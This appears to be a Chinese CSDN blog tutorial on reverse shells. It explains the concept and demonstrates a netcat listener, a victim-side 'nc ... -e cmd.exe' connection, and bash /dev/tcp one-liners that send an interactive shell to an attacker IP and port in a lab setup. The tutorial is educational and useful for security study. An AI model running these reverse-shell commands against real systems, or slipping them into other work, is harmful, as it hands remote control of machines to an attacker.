[基础]反弹shell--不定期更新

最新推荐文章于 2024-05-20 09:02:22 发布
最新推荐文章于 2024-05-20 09:02:22 发布
阅读量2.7k 收藏
点赞数 2
文章标签: linux 安全 bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuri5151/article/details/123387767
版权

概述

概念

反弹shell:控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端

  • 分析
  1. 正常情况下:用户在终端输入ssh root@ip登录目标机器,登录成功后即可开始shell操作登录服务器获取shell会话步骤
  2. 反弹shell:与正常sshd服务相反,由控制端监听,

用途

需要到服务器上执行shell命令,但因防火墙等原因,无法由客户端主动发起连接,就可以用shell来满足登录和操作要求
反弹👉攻击者指定服务器,受害者主机主动连接攻击者的服务器程序

几种方式

netcat

(此处试验:windows- powershell攻击,cmd受害)
本机开启监听服务:

nc -lvvp 2333

监听开启
受害机连接(并提供程序)

nc 127.0.0.1 2333 -e cmd.exe

受害机操作
攻击结果:
攻击结果
获取对方cmd

bash

常用bash结合重定向->一句话
具体命令:

bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1
bash -c "bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1"
# bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1
  • 过程解读
    bash产生了一个交互环境和本地主机主动发起与攻击机2333端口建立的连接(即TCP 2333会话连接)相结合,然后在重定向个TCP 2333会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个Bash反弹环境。

攻击:windows-powershell
受害:kali-bash

  1. 攻击机开启本地监听:
nc -lvvp 2333

攻击开启

  1. 受害机主动连接攻击机:
bash -i >& /dev/tcp/192.xxx.xx.xx/2333 0>&1

连接结果:
连接结果

晴空对晚照
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql-shell-8.0.18-windows-x86-64bit.zip
01-12
mysql-shell-8.0.18-windows-x86-64bit.zip MySQL Shell is an advanced command-line client and code editor for MySQL. In addition to SQL, MySQL Shell also offers scripting capabilities for JavaScript ...
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2400
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行。
Discuz-ssrf利用计划任务反弹shell
L18296069161的博客
12-27 211
渗透学习交流群773617250,群内定期通知课程内容、课程时间及直播地址,欢迎大家进群学习交流! 001 环境搭建:  Centos7(安装有apache,php,mysql,redis)  利用winscp把discuz的源码拖到var/www/html目录下:  chmod -R 777 upload/ 改一下权限  然后访问192.168.136.133/upload进行安装,但是...
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-28 3084
利用CrossC2插件工具,将Linux系统的shell反弹回Cobalt_Strike,方便后续的内网渗透。用CrossC2来反弹Linux主机shell给内网渗透工具Cobalt Strike(cs)。
(CVE-2021-44228)Apache_Log4j2_RCE漏洞复现(反弹shell教学)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-10 7088
Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。本文是log4j2的漏洞复现以及利用该漏洞进行命令执行RCE,反弹shell
linux-Shell基础视频教程
12-03
10.3.1 Shell基础-Bash基本功能-历史命令与补全.mp4 10.3.2 Shell基础-Bash基本功能-别名与快捷键.mp4 10.3.3 Shell基础-Bash基本功能-输入输出重定向.mp4 10.3.4 Shell基础-Bash基本功能-多命令顺序执行与管道符...
prometheus-shell-exporter:普罗米修斯贝壳出口商
04-16
Shell Exporter可以执行PowershellBash脚本,并将其输出转换为Prometheus指标。 指标 Shell Exporter会根据您的PowershellBash脚本名称公开指标。 可以在metrics文件夹中找到脚本示例 脚本名称 指标名称 bash_...
CVE-2018-3191 反弹shell
05-18
反弹shell
shell-operator:Shell-operator是用于在Kubernetes集群中运行事件驱动脚本的工具
02-03
Shell-operator用作支持Helm图表和值存储的更高级的基础Shell运算符提供: 轻松管理Kubernetes集群:使用Ops熟悉的工具。 它可以是bash,python,kubectl等。 Kubernetes对象事件:钩子可以通过add , update...
linux---进程通信
m0_74979625的博客
05-17 550
提示:以下是本篇文章正文内容,下面案例可供参考。
Linux】Centos7安装Redis
m0_72166275的博客
05-17 314
Reid 官网下载 Redis 7.2。
Linux 三十六章
一怀明月的博客
05-17 985
信号量 sem_init sem_destroy sem_wait sem_post 基于环形队列的CP问题 环形队列的生产者消费者模型 线程池 localtime时间戳转化 mkdir系统调用 bind绑定成员函数 懒汉饿汉单例模式 懒汉模式: 饿汉模式: 懒汉和饿汉相同点: 线程池源码实现
Linux动静态库
2301_80163789的博客
05-14 627
在程序翻译的链接阶段,其实就是把一堆.o文件链接在一起形成.exe文件。如果一个程序中需要链接很多个.o文件,那么这些.o文件就需要被打包才方便管理,**库文件本质就是把.o文件打包。**库文件是一种提高开发效率的手段。对于静态库,使用静态库形成可执行程序后,静态库被加载到了可执行程序的代码里,不需要让系统知道静态库在哪里;但对于动态库,由于动态库不加载到可执行程序里,而是动态加载到内存中,所以使用动态库要告诉系统动态库在哪(因为是系统来加载动态库)。动态库在编译时代码不会被复制到可执行文件中,而是。
linuxlinux中免交互命令expect原理与应用实战
最新发布
景天科技苑
05-20 1435
Expect 是基于 Tcl 的相对简单的一个免费的脚本编程工具语言,用来实现 自动和交互式任务程序进行通信,无需人的手工干预。比如 SSH、FTP 等,这些 程序正常情况都需要手工与它们进行交互,而使用 Expect 就可以模拟人手工交 互的过程,实现自动的和远程的程序交互,从而达到自动化运维的目的。
操作系统 实验13 批处理操作接口3:引用与命令替换
m0_63093530的博客
05-14 154
结果:第一个和第三个命令是错的,第二个和第四个命令是对的。echo "这是命令替换形式1...$date1"echo "$sv ++++加上另一些字符!2、输出字符串“China's panda”命令:echo China\'s panda。6、将命令date执行结果赋予变量date1。7、将命令date执行结果赋予变量date2。1、输出字符串“$Dollar”命令:echo \$Dollar。命令:date2=$(date)命令:date1=`date`
从零开始学习Linux(8)----自定义shell
lys20221113242的博客
05-14 243
shell从用户读入字符串“ls”,shell建立一个新的进程,然后在那个进程中运行ls程序并等待那个进程结束。然后shell读取新的一行输入,建立一个新的进程,在这个进程中运行程序,并等待这个进程结束。5. 父进程等待子进程退出(wait)3. 建立一个子进程(fork)4. 替换子进程(execvp)
Linux:网络管理命令之ss
hhd1988的专栏
05-17 812
Linux:网络管理命令之ss
linux中查找某个文件或文件夹
DN金猿的博客
05-18 244
locate命令将会在整个系统中搜索文件和文件夹,并通过正则表达式匹配以"/folder_name"结尾的路径。这将会在指定的路径(/path/to/search)中递归地列出所有文件和文件夹,并使用grep命令匹配以"/folder_name"结尾的行。该命令将会在指定的路径(/path/to/search)中查找名称为"folder_name"的文件夹。此方法与第2种方法类似,但使用了find命令来递归搜索文件夹,并使用grep命令来匹配以"/folder_name"结尾的行。
cve-2021-44228反弹shell不成功
09-19
总结来说,CVE-2021-44228反弹shell不成功可能是由于受影响的服务器未及时更新修补程序、防火墙或其他安全设备过滤了恶意命令,或者服务器上具有其他安全防护措施。要解决这个问题,管理员应确保服务器已正确更新...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值